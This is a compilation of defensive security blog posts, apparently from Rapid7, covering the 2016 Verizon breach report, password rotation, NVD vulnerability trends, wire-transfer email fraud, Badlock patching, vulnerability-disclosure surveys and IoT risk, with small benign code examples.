So, our adversaries are accomplishing their goals in days or less at an ever-quickening success rate while defenders are just not keeping up at all. Before we can understand what we need to do to reverse these trends, we need to see what the attackers are doing. We took the data from DBIR Figure 6 (page 9) and pulled out the top threat actions for each year, then filtered the result to the areas that match both the major threat action categories and the areas of concern that Rapid7 customers have a keen focus on:


Some key takeaways:

  • Malware and hacking events dropping C2s are up
  • Key loggers are making a comeback (this may be an artifact of the heavy influence of Dridex in the DBIR data set this year)
  • Malware-based exfiltration is back to previously seen levels
  • Phishing is pretty much holding steady, which is most likely supporting the use of compromised credentials (which is trending up)


Endpoint monitoring, kicking up your awareness programs, and watching out for wonky user account behavior would be wise things to prioritize based on this data.


Not all Cut-and-Dridex

The Verizon Data Breach Report mentions Dridex 13 times and was very up front about the bias it introduced in the report. So, how can you interpret the data with "DrideRx" prescription lenses? Rapid7's Analytic Response Team notes that Dridex campaigns involve:


  • Phishing
  • Endpoint malware drops
  • Establishment of command and control (C2) on the endpoint
  • Harvesting credentials and shipping them back to the C2 servers


This means that—at a minimum—the data behind the Data Breach Investigations Report, Figures 6-8 & 15-22, impacted the overall findings and Verizon itself warns about broad interpretations of the Web App Attacks category:


"Hundreds of breaches involving social attacks on customers, followed by the Dridex malware and subsequent use of credentials captured by keyloggers, dominate the actions."


So, when interpreting the results, keep an eye out for the above components and factor in the Dridex component before tweaking your security program too much in one direction or another.


Who has your back?


When reading any report, one should always check to make sure the data presented doesn't conflict with itself. One way to validate the detection deficit above is to look at DBIR Figure 9 (page 11), which shows (when known) how breaches were discovered over time. We can simplify this view as well:


In the significant majority of cases, defenders have law enforcement agencies (like the FBI in the United States) and other external parties to "thank" for letting them know they've been pwnd. As our figure shows, we stopped being able to watch our own backs half a decade ago and have yet to recover. This should be a wake-up call to defenders to focus on identifying how attackers are getting into their organizations and instrumenting better ways to detect their actions.


Are you:


  • Identifying critical assets and access points?
  • Monitoring the right things (or anything) on your endpoints?
  • Getting the right logs into the right places for analysis and action?
  • Deploying honeypots to catch activity that should not be happening?


If not, these may be things you need to re-prioritize in order to force the attackers to invest more time and resources to accomplish their goals (remember, this is a battle of economics).


Are You Feeling Vulnerable?


Attackers are continuing to use stolen credentials at an alarming rate and they obtain these credentials through both social engineering and the exploitation of vulnerabilities. Similarly, lateral movement within an organization also relies—in part—on exploiting vulnerabilities. DBIR Figure 13 (page 16) shows that as a group, defenders are staying on top of current and year-minus-one vulnerabilities fairly well:



We're still having issues patching or mitigating older vulnerabilities, many of which have tried-and-true exploits that will work juuuust fine. Leaving these attack points exposed is not helping your economic battle with your adversaries, as letting them rely on past R&D means they have more time and opportunity. How can you get the upper-hand?


  • Maintain situational awareness when it comes to vulnerabilities (i.e. scan with a plan)
  • Develop a patching strategy with a holistic focus, rather than just reacting to "Patch Tuesday"
  • Don't dismiss mitigation. There are legitimate technical and logistic reasons that can make patching difficult. Work on developing a playbook of mitigation strategies you can rely on when these types of vulnerabilities arise.


"Threat intelligence" was a noticeably absent topic in the 2016 DBIR, but we feel that it can play a key role when it comes to defending your organization when vulnerabilities are present. Your vuln management, server/app management, and security operations teams should be working in tandem to know where vulnerabilities still exist and to monitor and block malicious activity that is associated with targets that are still vulnerable. This is one of the best ways to utilize all those threat intel feeds you have gathering dust in your SIEM.


There and Back Again


This post outlined just a few of the interesting markers on your path through the Verizon Data Breach Report. Keep a watchful eye on the Rapid7 Community for more insight into other critical areas of the report and where we can help you address the key issues facing your organization.

(Many thanks to Rapid7's Roy Hodgman and Rebekah Brown for their contributions to this post.)


Related Resources:


Watch my short take on this year's Verizon Data Breach Investigations Report.



Join us for a live webcast as we dig deeper into the 2016 Verizon Data Breach Investigations Report findings. Tuesday, May 10 at 2PM ET/11AM PT. Register now!

This is a guest post from our frequent contributor Kevin Beaver. You can read all of his previous guest posts here.


I'm often asked by friends and colleagues: Why do I have to change my password every 30 or 60 days? My response is always the same: Odds are good that it’s because that's the way that it's always been done. Or, these people might have a super strict IT manager who likes to show - on paper - that his or her environment is "locked down." Occasionally I will get feedback that auditors require such stringent settings. The funny thing is, there's never really a good business reason behind such short-term password changes.


In fact, if you dig in further, in many cases there are numerous other issues that are a much higher risk than passwords that are not changed often. I often see weak password requirements – i.e. complexity not being enforced or 6-character minimum lengths. I often see this combined with super weak endpoint security such as minimal Windows patching, no third-party software patching, no full disk encryption, and network monitoring/alerting that is reactive at best.

So, why is it that we go with the 30, 60, or 90-day password change requirements? I don't think it's malicious but I do believe that people just aren't taking the time to think about what they're doing. In fact that's sort of the essence of many security challenges that businesses face today. People just aren’t thinking about what they're actually doing. They're going through the motions with their “policies” and they have these fancy technologies deployed but, in reality, the implementation of everything stinks. At the end of the day, management assumes that all is well because of all of the money and effort being spent on these issues (including those pesky password changes) but, yet, they still get hit with breaches and no one can figure out why.


I think many seasoned IT and security professionals would agree with me that quick turnarounds on password changes are actually bad for security. We always joke about how users will write down their passwords on sticky notes – and it's true! But it goes deeper than the humor. There's a strong political factor at the root of much of the password nonsense: users don't want to have to create and remember long passwords.


After all, odds are they’ve never been taught or guided to use passphrases, which are super simple to create and remember yet extremely hard to crack. Furthermore, management doesn't want to hear about it, so IT doesn't press the issue. Thus the ignorant cycle: if we can't make them use strong passphrases, we can at least require quick password changes. The madness continues and it’s bad for business.
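A back-of-the-envelope comparison shows why passphrases hold up, assuming characters and words are chosen at random (the charset and wordlist sizes here are illustrative):

```python
# Rough entropy comparison: an 8-character "complex" password drawn from
# ~94 printable ASCII characters vs. a 5-word Diceware-style passphrase
# drawn from a 7776-word list. Both figures assume random selection.
import math

password_bits = 8 * math.log2(94)      # ~52 bits
passphrase_bits = 5 * math.log2(7776)  # ~65 bits

print(f"8-char password:   {password_bits:.0f} bits")
print(f"5-word passphrase: {passphrase_bits:.0f} bits")
```

The passphrase wins on strength while being far easier to remember, which is the whole point.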


Anytime you create complexity – in this case, requiring users to continually change their passwords whether or not they’re suspected to have been compromised – you create more problems than you solve in most cases. There are always exceptions, and compensating controls such as intruder lockout, two-factor authentication, and proactive system monitoring can thwart most attacks on user accounts. It’s time to look past the nonsense and capitalize on opportunities such as this to get people on our side rather than continue ticking them off.

This is a guest post by Ismail Guneydas. Ismail Guneydas is a senior technical leader with over ten years of experience in vulnerability management, digital forensics, e-crime investigations, and teaching. Currently he is a senior vulnerability manager at Kimberly-Clark and adjunct faculty at Texas A&M. He holds an M.S. in computer science and an MBA.


2015 is in the past, so now is as good a time as any to get some numbers together from the year that was and analyze them.  For this blog post, we're going to use the numbers from the National Vulnerability Database and take a look at what trends these numbers reveal.


Why the National Vulnerability Database (NVD)?  To paraphrase Wikipedia for a moment, it's a repository of vulnerability management data, assembled by the U.S. Government, represented using the Security Content Automation Protocol (SCAP). Most relevant to our exercise here, the NVD includes databases of security-related software flaws, misconfigurations, product names, impact metrics—amongst other data fields.

By poring over the NVD data from the last 5 years, we're looking to answer the following questions:

  • What are the vulnerability trends of the last 5 years, and do vulnerability numbers indicate anything specific?
  • What are the severities of vulnerabilities? Do we have more critical vulnerabilities or less?
  • What vendors create most vulnerable products?
  • What products are most vulnerable?
    • Which OS? Windows OSX, a Linux distro?
    • Which mobile OS? IOS, Android, Windows?
    • Which web browser? Safari, Internet Explorer, Firefox?


Vulnerabilities Per Year



That is correct! Believe it or not, there was a 20% drop in the number of vulnerabilities compared to 2014. However, if you look at the overall growth trend of the last 5 years, the 2015 number seems consistent with the overall growth rate; the abnormality was the 53% increase in 2014. If we compare 2015's numbers with 2013's, we see a 24% increase.


All in all, though, this doesn't mean we didn't have an especially bad year, as we did in 2014 (the trend shows us we will have more vulnerabilities in the next few years as well). That's because when we look closely at the critical vulnerabilities, we see something interesting: there were more critical vulnerabilities in 2015 than in 2014. In 2014 we had more vulnerabilities with CVSS 4, 5, and 6; however, 2015 had more vulnerabilities with CVSS 7, 8, 9, and 10!



As you see above, there were 3376 critical vulnerabilities in 2015, whereas there were only 2887 critical vulnerabilities in 2014. (That is a 17% increase.)
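The arithmetic behind that figure is easy to sanity-check (the counts are the ones quoted above):

```python
# Percentage change in critical vulnerabilities, 2014 -> 2015.
def pct_change(new, old):
    """Percentage change from old to new."""
    return (new - old) / old * 100

increase = pct_change(3376, 2887)  # 2015 criticals vs. 2014 criticals
print(f"{increase:.0f}% increase")  # -> 17% increase
```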


In other words, the proportion of critical vulnerabilities is increasing overall. That means we need to pay close attention to our vulnerability management programs and make sure they are effective—fewer false positives and negatives—up-to-date with recent vulnerabilities, and faster with shorter scan times.


Severity of Vulnerabilities

This chart shows weight distribution of 2015 vulnerabilities, based on CVSS score. As (hopefully) most of you know, 10 is the highest/most critical level, whereas 1 is the least critical level.



There are many vulnerabilities with CVSS 9 and 10. Let's check the following graph, which gives a clearer picture:



This means 36% of the vulnerabilities were critical (CVSS >= 7). The average CVSS is 6.8, which sits right at the critical boundary.
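Computing those two summary numbers from a list of CVSS base scores is straightforward. A minimal sketch (the sample scores below are made up for illustration, not the 2015 NVD data):

```python
# Share of critical findings (CVSS >= 7.0) and the mean score.
def severity_summary(scores, critical_cutoff=7.0):
    critical = sum(1 for s in scores if s >= critical_cutoff)
    return critical / len(scores), sum(scores) / len(scores)

sample = [10.0, 9.3, 7.5, 6.8, 5.0, 4.3, 2.1, 7.2]  # hypothetical scores
share, mean = severity_summary(sample)
print(f"critical: {share:.0%}, average CVSS: {mean:.2f}")
```

Run against the real NVD feed for a year, the same two lines reproduce the 36% / 6.8 figures cited above.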


The severity of vulns is increasing, but this isn’t to say it’s all bad. In fact, it exposes a crucial point: you have to deploy a vulnerability management program that separates the wheat from the chaff. An effective vulnerability management program will help you find and then remediate the vulnerabilities in your environment.


Vulnerability Numbers Per Vendor

Let's analyze the National Vulnerability Database numbers by checking vendors' vulnerabilities. The shifting tides in vulnerabilities don’t stop for any company, including Apple. The fact is there are always vulnerabilities; the key is detecting them before they are exploited.


Apple had the highest number of vulnerabilities in 2015. Of course, with many iOS and OS X vulnerabilities out there in general, it's no surprise this number went up.


Here is the full list:



Apple jumped from number 5 in 2014, when Microsoft was number 3 and Cisco number 4. Surprisingly, Oracle (owner of Java) did well this year and took 4th place (they were number 2 last year). Congratulations (?) to Canonical and Novell, as they were not in the top 10 list last year (they were 13th and 15th). So in terms of prioritization, with Apple making a big jump last year, if you have a lot of iOS in your environment, it's definitely time to make sure you've prioritized those assets accordingly.


Here's a comparison chart that shows number of vulnerabilities per vendor for 2014 and 2015.



Vulnerabilities Per OS

In 2015, according to the NVD, OSX had the most vulnerabilities, followed by Windows 2012 and Ubuntu Linux.



Here the most vulnerable Linux distro is Ubuntu; openSUSE is the runner-up, followed by Debian. Interestingly, Windows 7, the most widely used desktop OS, is reported to be less vulnerable than Ubuntu. (That may surprise a few people!)


Vulnerabilities Per Mobile OS



iPhone OS had the highest number of vulnerabilities published in 2015, with Windows and Android following. 2014 was no different: iPhone OS had the highest number of vulnerabilities, followed by Windows RT and Android.


Vulnerabilities Per Application


Vulnerabilities Per Browser


IE had the highest number of vulnerabilities in 2015. In 2014, the order of the products with the highest number of vulnerabilities was exactly the same (IE, Chrome, Firefox, Safari).



Given the trends of the past few years reported via the NVD, we should expect more vulnerabilities with higher CVSS scores to be published this year. Moreover, I predict that mobile OSes will be a hot area for security — as more mobile security professionals find and report mobile OS vulnerabilities, we'll see an increase in mobile OS vulnerabilities as well.


It’s all about priorities. We only have so many hours in the day and resources available to us to remediate what we can. But if you take intel from something like the NVD and layer that over the visibility you have into your own environment, you can use this information to help build a good to-do list built by priorities, and not fear.

The FBI this week posted an alert that showed wire transfer scams bled $2.3 Billion from “business email compromise” from October 2013 through February 2016.  A couple of news outlets picked this up, including Brian Krebs.


When I was the head of security at a multi-national corporation, this was an issue that came up regularly. There were instances of very aggressive behavior, such as someone calling the call center pretending to be the CEO of one of the countries and demanding a $1 million dollar transfer. That was a very bold and very obvious fraud that the call center was able to handle. However, very often these requests came though email, just like the FBI reported.


When this happens, the scammer normally uses either a forged email domain very similar to the corporate one, i.e. vs (look closely), hoping that a mail client without a fixed-width font will trick the user into seeing the domain as legitimate, or a subdomain that looks very similar. Then the header is simply forged. In simple mail clients, like Gmail, you have to take extra steps to see the actual sender domain.
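One cheap detection layer is to flag From: domains that are close to, but not exactly, your own. A minimal sketch, where example.com and the sample headers are hypothetical stand-ins (a real mail pipeline would also check the envelope sender and Received chain):

```python
# Flag lookalike sender domains: similar to the corporate domain, but not it.
import difflib
from email.utils import parseaddr

CORPORATE_DOMAIN = "example.com"  # hypothetical corporate domain

def sender_domain(from_header):
    # parseaddr handles display names like '"CEO" <ceo@examp1e.com>'
    _, addr = parseaddr(from_header)
    return addr.rpartition("@")[2].lower()

def is_suspicious(from_header, threshold=0.8):
    domain = sender_domain(from_header)
    if domain == CORPORATE_DOMAIN:
        return False
    # High similarity without an exact match suggests a lookalike domain.
    ratio = difflib.SequenceMatcher(None, domain, CORPORATE_DOMAIN).ratio()
    return ratio >= threshold

print(is_suspicious('"The CEO" <ceo@examp1e.com>'))  # lookalike -> True
print(is_suspicious('"The CEO" <ceo@example.com>'))  # exact match -> False
```

This is a heuristic, not a control; it complements, rather than replaces, the process measures described below.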



The emails are usually pretty short and lacking detail, such as:


“I need you to immediately produce a wire transfer for $13,000 and sent to the bank listed. I will follow up with you later.”





And you might have a pdf attachment with banking details. Oddly enough, the PDFs I encountered were never malicious. They had legitimate account details so the wire transfers could be received.


Now you might think this is too simple and shouldn’t work. But obviously, it does, to the tune of $2.3 billion. You might ask yourself why, and if you aren’t, I’ll ask it for you. Self, why does this work?


Well, consider that you might have a multibillion-dollar corporation located in many countries. If you do business in certain countries, wire transfers are the norm, so wire transfers become part of a normal process for that company. And when someone asks for $13,000, or even as much as $75,000, from a company that posts $4.3 billion in revenue, no one blinks an eye.


Scammers do a little recon, ask for an amount that is small to the company, and it gets processed. Little risk, high reward.

How would you protect against this?


The simplest method is verification of the request. The FBI suggests that a telephone call be placed to verify the request, which is a good practice. They also suggest two-factor authentication for email, and limiting social media activity, since scammers will do reconnaissance and determine if CEOs are traveling.


Krebs points out that some experts rely on technological controls such as DKIM and SPF. While these are things we recommend in our consultancy, they are complex for low-maturity organizations and do require some effort and support. At the end of the day, they don’t actually solve the problem, because the scammers are socially engineering human beings.


While all of these technology controls are good, we are dealing with humans. The best way to prevent this fraud from occurring is creating simple business processes that are enforced. In security terms, we would call this segregation of duties.


The simplest security


Simply put, segregation of duties says that no one person or role should be allowed to execute a business process from start to finish. In the case of wire transfer fraud, for example, one person/role should not be able to create the wire transfer, approve it, and execute it. Dividing these duties between two or more persons/roles means more eyes on the situation and a better chance of catching the fraud. A simple process map might look like:



Ensure that Role A and Role B keep proper documentation (evidence) for each step of the request and approval, and you now have a specific security control that integrates easily into a business process. The key to enforcement: making sure every single request follows the chain every single time. No exceptions.
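The control is simple enough to express in code. This sketch is illustrative only (the class and role names are made up), but it captures the invariant: no execution without approval from someone other than the requester:

```python
# Segregation-of-duties sketch: a wire transfer requires a distinct approver.
class WireTransfer:
    def __init__(self, amount, requested_by):
        self.amount = amount
        self.requested_by = requested_by
        self.approved_by = None

    def approve(self, approver):
        # Role A cannot approve its own request.
        if approver == self.requested_by:
            raise PermissionError("requester cannot approve their own transfer")
        self.approved_by = approver

    def execute(self):
        # No approval on file, no money moves.
        if self.approved_by is None:
            raise PermissionError("transfer has not been approved")
        return (f"wired ${self.amount:,} (requested by {self.requested_by}, "
                f"approved by {self.approved_by})")

transfer = WireTransfer(13_000, requested_by="role_a")
transfer.approve("role_b")   # a second, distinct role signs off
print(transfer.execute())
```

Whatever system actually processes your transfers, the point is that the check lives in the process itself, not in anyone's judgment under pressure.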


Now let me tell you about the one that almost made it.


There was one instance I dealt with which was one mouse click away from being executed.


An email (very similar to the example above) was sent to a director of finance, purportedly from the CEO. The director was busy that day and filed the email away for processing later. By 4:55 pm or so, she realized she had not acted on the request. As it was almost the end of the day, and wire transfers are not processed by most banks after banking hours, she hurriedly forwarded the email to the wire transfer processor, marked it urgent, and made a call to ensure it was processed immediately. By the time it was picked up and put into the process, banks were closed, so they agreed it would execute first thing the next morning.


That evening, a series of emails went back and forth between the approver – a finance analyst who held very firm to the process – and the requester. Though the request was marked urgent, and people were shouting that it came from the CEO, the process prevailed.


All this time, no one thought to actually verify the request, which was not part of the process at that time. But because the approver was uncooperative with the request, it was escalated to the CFO (the CEO was traveling), who suspected it was fraudulent and contacted me. We determined almost immediately that it was fake, just by looking at the email headers. There were other indicators too.


I immediately praised everyone involved, and bought them gifts for sticking to the process. The director might have felt ashamed, but I went to her as well and explained that these scams are successful because they count on stress and distraction to occur. These are normal human behaviors, and they sometimes cause us to act erratically. But because we had a firm process that was adhered to, all we lost was time.


There’s actually much more to this story, but I’ll save that for future posts.


Regardless of your organization's size or structure, you too can put this in place. If you are unsure whether these processes exist, start asking around. Begin with your controllers or comptrollers, or anyone in finance. Ask whether you have a process for wire transfers and, if so, what it is. Get involved and understand how your business does business. This will benefit you in many ways.


Other things you can do:


  • Join InfraGard, the FBI's partnership with the private sector, which will give you access to in-depth resources and information. You can also report fraud to IC3, the Internet Crime Complaint Center.
  • Ensure you have a separation-of-duties policy that is enforced.
  • Periodically train the people involved and keep their awareness of these issues up to date.


All of these are free, requiring only a time investment, and they will go a long way toward avoiding the kind of wire transfer fraud the FBI is warning about.

Today is Badlock Day

You may recall that the folks behind the disclosure stated about 20 days ago that April 12 would see patches for "Badlock," a serious vulnerability in the SMB/CIFS protocol that affects both Microsoft Windows and any server running Samba, an open source workalike for SMB/CIFS services. We talked about it in our Getting Ahead of Badlock post, and hopefully IT administrators have taken advantage of the pre-release warning to clear their schedules for today's patching activities.


For Microsoft shops, this should have been straightforward, since today is also Microsoft Patch Tuesday. Applying critical Microsoft patches is, after all, a pretty predictable event.


For administrators of servers running other operating systems that also happen to offer Samba: we've all had a rough couple of years of (usually) coordinated disclosures and updates around core system libraries, so this event can piggyback on those established procedures.


How worried should I be?

While we do recommend you roll out the patches as soon as possible - as we generally do for everything - we don't think Badlock is the Bug To End All Bugs[TM]. In reality, an attacker must already be in a position to do harm in order to use it, and if they are, there are probably other, worse (or better, depending on your point of view) attacks they could leverage.


Badlock describes a Man-in-the-Middle (MitM) vulnerability affecting both Samba's implementation of SMB/CIFS (as CVE-2016-2118) and Microsoft's (as CVE-2016-0128). This is NOT a straightforward remote code execution (RCE) vulnerability, so it is unlike MS08-067 or the other historical RCE issues against SMB/CIFS. More details about Badlock and the related issues can be found on the official Badlock site.


The most likely attack scenario is an internal user who is in the position of intercepting and modifying network traffic in transit to gain privileges equivalent to the intercepted user. While some SMB/CIFS servers exist on the Internet, this is generally considered poor practice, and should be avoided anyway.


What's next?

For Samba administrators, the easy advice is to just patch now. If you're absolutely sure you're not offering CIFS/SMB over the Internet with Samba, check again: unintentionally exposed services are the bane of IT security, given the porous nature of network perimeters.
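That "check again" can start as simply as confirming whether TCP/445 answers from the outside. The sketch below, with a hypothetical `smb_port_open` helper and a placeholder address from the TEST-NET range, only tells you the port is reachable; substitute your own externally visible hosts, and treat any "open" result as a prompt for a proper audit, not proof of vulnerability.

```python
# Quick reachability check for SMB's TCP port 445. Run this only
# against addresses you are authorized to test.
import socket

def smb_port_open(host, port=445, timeout=3.0):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Placeholder address (TEST-NET, never routable); replace with your
# own perimeter hosts.
host = "192.0.2.10"
print(host, "open" if smb_port_open(host, timeout=1.0) else "closed/filtered")
```

A port scanner you already run (or your external vulnerability scans) will do the same job at scale; the point is to verify rather than assume.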


While you're checking, go ahead and patch, since both private and public exploits will surface eventually. You can bet that exploit developers around the world are poring over the Samba patches now. In fact, you can track public progress over at the Metasploit Pull Request queue, but please keep your comments technically relevant and helpful if you care to pitch in.


For Microsoft Windows administrators, Badlock is apparently fixed in MS16-047. While Microsoft merely rates this as "Important," there are plenty of other critically rated issues released today, so IT organizations are advised to use their already-negotiated change windows to test and apply this latest round of patches.


Rapid7 will be publishing both Metasploit exploits and Nexpose checks just as soon as we can, and this post will be updated when those are available. These should help IT security practitioners to identify their organizations' threat exposure on both systems that are routinely kept up to date, as well as those systems that are IT's responsibility but are, for whatever reason, outside of IT's direct control.


Are any Rapid7 products affected?

No Rapid7 products are affected by this vulnerability.

Maybe I’m being cynical, but I feel like that may well be the thought that a lot of people have when they hear about two surveys posted online this week to investigate perspectives on vulnerability disclosure and handling. Yet despite my natural cynicism, I believe these surveys are a valuable and important step towards understanding the real status quo around vulnerability disclosure and handling so the actions taken to drive adoption of best practices will be more likely to have impact.


Hopefully this blog will explain why I feel this way. Before we get into it, here are the surveys:


A little bit of background…


In March 2015, the National Telecommunications and Information Administration (NTIA) issued a request for comment to “identify substantive cybersecurity issues that affect the digital ecosystem and digital economic growth where broad consensus, coordinated action, and the development of best practices could substantially improve security for organizations and consumers.” Based on the responses they received, they then announced that they were convening a “multistakeholder process concerning collaboration between security researchers and software and system developers and owners to address security vulnerability disclosure.”


This announcement was met by the deafening sound of groaning from the security community, many of whom have already participated in countless multistakeholder processes on this topic. The debate around vulnerability disclosure and handling is not new, and it has a tendency to veer towards the religious, with security researchers on one side, and technology providers on the other. Despite this, there have been a number of good faith efforts to develop best practices so researchers and technology providers can work more productively together, reducing the risk on both sides, as well as for end-users. This work has even resulted in two ISO standards (ISO 29147 & ISO 30111) providing vulnerability disclosure and handling best practices for technology providers and operators. So why did the NTIA receive comments proposing this topic?  And of all the things proposed, why did they pick this as their first topic?


In my opinion, it’s for two main, connected reasons.


Firstly, despite all the phenomenal work that has gone into developing best practices for vulnerability disclosure and handling, adoption of these practices is still very limited. Rapid7 conducts quite a lot of vulnerability disclosures, either for our own researchers or, on occasion, for researchers in the Metasploit community who don't want to deal with the hassle. Anecdotally, we reckon we receive a response to these disclosures maybe 20% of the time; the rest of the time, it's crickets. In fact, at the first meeting of the NTIA process in Berkeley, Art Manion of the CERT Coordination Center commented that they've taken to sending registered snail mail because it's the only way they can be sure a disclosure has been received. It was hard to tell whether he was joking.


So adoption still seems to be a challenge, and maybe some people (like me) hope this process can help. Of course, the efforts that went before tried to drive adoption, so why should this one be any different?


This brings me to the second of my reasons for this project, namely that the times have changed, and with them the context. In the past five years, we’ve seen a staggering number of breaches reported in the news; we’ve seen high-profile branded vulnerability disclosures dominate headlines and put security on the executive team’s radar. We’ve seen bug bounties starting to be adopted by the more security-minded companies. And importantly, we’ve seen the Government start to pay attention to security research – we’ve seen that in the DMCA exemption recently approved, the FDA post-market guidance being proposed, the FTC’s presence at DEF CON, the Department of Defense’s bug bounty, and of course, in the very fact that the NTIA picked this topic. None of these factors alone creates a turn of the tide, but combined, they just might provide an opportunity for us to take a step forward.


And that’s what we’re talking about here – steps. It’s important to remember that complex problems are almost never solved overnight. The work done in this NTIA process builds on work conducted before: for example the development of best practices; the disclosure of vulnerability research; efforts to address or fix those bugs; the adoption of bug bounties. All of these pieces make up a picture that reveals a gradual shift in the culture around vulnerability disclosure and handling. Our efforts, should they yield results, will also not be a panacea, but we hope they will pave the way for other steps forward in the future.


OK, but why do we need surveys?


As I said above, discussions around this tend to become a little heated, and there’s not always a lot of empathy between the two sides, which doesn’t make for great potential for finding resolution. A lot of this dialogue is fueled by assumptions.

My experience and resulting perspective on this topic stems from having worked on both sides of the fence – first as a reputation manager for tech companies (where my reaction to a vulnerability disclosure would have been to try to kill it with fire); and then more recently I have partnered with researchers to get the word out about vulnerabilities, or have coordinated Rapid7’s efforts to respond to major disclosures in the community. At different points I have responded with indignation on behalf of my tech company client, who I saw as being threatened by those Shady Researcher Types, and then later on behalf of my researcher friends, who I have seen threatened by those Evil Corporation Types. I say that somewhat tongue-in-cheek, but I do often hear that kind of dialogue coming from the different groups involved, and much worse besides. There are a lot of stereotypes and assumptions in this discussion, and I find they are rarely all that true.


I thought my experience gave me a pretty good handle on the debate and the various points of view I would encounter. I thought I knew the reality behind the hyperbolic discourse, yet I find I am still surprised by the things I hear.


For example, it turns out a lot of technology providers (both big and small) don’t think of themselves as such and so they are in the “don’t know what they don’t know” bucket. It also turns out a lot of technology operators are terrified of being extorted by researchers. I’ve been told that a few times, but had initially dismissed it as hyperbole, until an incredibly stressed security professional working at a non-profit and trying to figure out how to interpret an inbound from a researcher contacted me asking for help. When I looked at the communication from the researcher, I could absolutely understand his concern.


On the researcher side, I've been saddened by the number of people who tell me they don't want to disclose findings because they're afraid of legal threats from the vendor. Yet more have told me they see no point in disclosing to vendors because they never respond. As I said above, we can relate to that point of view! At the same time, we recently disclosed a vulnerability to Xfinity and missed disclosing through their preferred reporting route (we disclosed to Xfinity addresses rather than to their recommended reporting channel). When we went public, they pointed this out, and they were actually very responsive and engaged regarding the disclosure. We realized that we've become so used to a lack of response from vendors that we stopped pushing ourselves to do everything we can to get one. If we care about reaching the right outcome to improve security - and we do - we can't allow ourselves to become defeatist.


My point here is that assumptions may be based on past experience, but that doesn't mean they are always correct, or even still correct in the current context. Assumptions, particularly erroneous ones, undermine our ability to understand the heart of the problem, which reduces our chances of proposing solutions that will work. Assumptions and stereotypes are also clear signs of a lack of empathy. How will we ever achieve any kind of productive collaboration, compromise, or cultural evolution if we aren't able or willing to empathize with each other? I rarely find that anyone is driven by purely nefarious motives, and understanding what actually does motivate people, and why, is the key to informing and influencing behavior to effect positive change. Even if, in some instances, it means that it's your own behavior that might change. :)


So, about those surveys…


The group that developed the surveys - the Awareness and Adoption Group participating in the NTIA process (not NTIA itself) - comprises a mixture of security researchers, technology providers, civil liberties advocates, policy makers, and vulnerability disclosure veterans and participants. It's a pretty mixed group, and it's unlikely we all have the same goals or priorities in participating, but I've been very impressed and grateful that everyone has made a real effort to listen to and understand each other's points of view. Our goal with the surveys is to do that on a far bigger scale, so we can really understand a lot more about how people think about this topic. Ideally we will see responses from technology providers and operators, and from security researchers who would not normally participate in something like the NTIA process; they are the vast majority, and we want to understand their (your?!) perspectives. We're hoping you can help us test any assumptions we may have - the only hypothesis we hope to prove here is that we don't know everything and can still learn.


So please do take the survey that relates to you, and please do share them and encourage others to do likewise:


Thank you!


Recently I transitioned from a Principal Consultant role into a new role at Rapid7, as Research Lead with a focus on IoT technology, and it has been a fascinating challenge. Although I have been conducting research for a number of years, covering everything from format string and buffer overflow research on Windows applications to exploring embedded appliances and hacking multifunction printers (MFPs), conducting research in the IoT world is truly exciting, and it has taught me to be even more open-minded.


That is, open-minded to the fact that there are people out there attaching technology to anything and everything. (Even toothbrushes.)




As a security consultant over the last eight years, I have focused most of my research on operational-style attacks, which I have developed and used to compromise systems and data during penetration testing. An operational attack uses the operational features of a device against itself.


As an example, if you know how to ask nicely, MFPs will often give up Active Directory credentials, or, as recent research has disclosed, network management systems will openly consume SNMP data without questioning its content or where it came from.


IoT research is even cooler because now I get the chance to expand my experience into a number of new avenues. Historically, I have prided myself on the ability to define the risk around my research and communicate it well. With IoT, I initially shuddered at the question: "How do I define risk?"


IoT Risk

In the past, it has been fairly simple to define and explain risk as it relates to operational-style attacks within an enterprise environment, but with IoT technology I initially struggled with the concept. This was mainly because most IoT technologies appear to be consumer-grade products. If someone hacks my toothbrush, they may learn how often I brush my teeth. What is the risk there, and how do I measure it?


The truth is, the deeper I head down this rabbit hole called IoT, the more my understanding of risk grows. A prime example of defining such risk was pointed out by Tod Beardsley in his blog post "The Business Impact of Hacked Baby Monitors." At first look, we might easily jump to the conclusion that there is no serious risk to an enterprise business. But on a second take, if a malicious actor can use some innocuous IoT technology to gain a foothold in the home network of one of your employees, they could then potentially pivot onto the corporate network via remote access, such as a VPN. This is a valid risk that can be communicated and should be taken seriously.


IoT Research

To better define risk, we need to ensure our research involves all aspects of IoT technology. When researching and testing IoT, researchers can often develop a form of tunnel vision, focusing on the technology from a single point of reference, such as the device itself.


While working on and discussing IoT technology with my peers at Rapid7, I have grown to appreciate the complexity of IoT and its ecosystem. Yes, ecosystem: this is where we consider the entire security picture of IoT, not just one facet of the technology. The ecosystem comprises three categories, and we must consider how each category interacts with and impacts the others. We cannot test one without the others and consider that testing effective; we must test each one, and also test how they affect each other.




With IoT quickly becoming more than just consumer-grade products, we are starting to see more IoT-based technologies migrating into the enterprise environment. If we are ever going to build a secure IoT world, it is critical during our research that all aspects of the ecosystem are addressed.


The knowledge we gain from this research can help enterprises better cope with new security risks, make better decisions on technology purchases, and help employees stay safe in their home environments, which in turn leads to better security for our enterprises. Thorough research can also deliver valuable knowledge back to vendors, making it possible to improve product security during the design, creation, and manufacturing of IoT technology, so that new vendors and new products are not recreating the same issues over and over.


So, as we continue down the road of IoT research, let us focus our efforts on the entire ecosystem. That way we can ensure that our efforts lead to a complete picture and culminate in security improvements within the IoT industry.
